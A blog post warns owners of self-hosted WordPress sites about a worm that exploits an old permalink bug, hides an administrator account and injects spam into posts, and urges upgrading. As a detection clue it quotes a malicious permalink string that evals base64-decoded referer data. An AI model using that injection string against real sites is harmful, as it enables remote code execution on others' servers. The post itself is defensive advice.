Tuesday Tech: Take the time to upgrade!

Take a long holiday weekend, combine it with being home with a preschooler and infant twins all weekend with a husband off working, and you have a recipe for several days of I-don’t-have-time-to-read-my-tech-blogs.

Mix in an insidious worm making its rounds and infecting self-hosted WordPress installations, and you’ve got me, right now, steaming mad at spammers, whom I like to frequently refer to as the wastrels of the internet.

This morning at 5:30am, while scanning through some of my favorite tech blogs, I came across a post about this worm, and of course I started checking our clients’ blogs.

Yech, one client has been hacked. The blog is not, thankfully, ruined, but the process that has to be done in order to heal the blog is slightly arduous.

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.

I have clients who opt to hold off on a WordPress upgrade because maybe they are reticent about having to learn how to navigate around a new backend interface, or maybe they are concerned about the time it will take to upgrade (note: the newer versions of WordPress have a great automatic upgrade feature built in, so upgrades shouldn’t take any longer than 5-10 minutes, depending on if you have to adjust any of your plugins for the upgrade). The ever-popular Lorelle On WordPress says it best: “This attack is serious enough to overcome all your fears of updating.” And as far as the cost of having your web team do your upgrade (if you don’t know how to do it yourself)? Far less expensive and much less of a hassle than having to then have your web team clean up after an attack.

Now, if you will excuse me, I’m off to do a whole slew of upgrades, and hopefully no more clean-ups!

· · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · ·

6 thoughts on “Tuesday Tech: Take the time to upgrade!”

The aftermath: we had one site affected (all cleaned up now), and all but one site is upgraded (client asked me to wait a few days). Phew! The nice thing about the current versions of WP is that they’ve made upgrades super easy to do, so all our future upgrades will now be cake!

Thanks on the congrats… hard to believe they are almost five and a half months already. My big sis is indeed happy, but THEIR big brother (my four and a half year old) is still over-the-moon. SO thankful for that!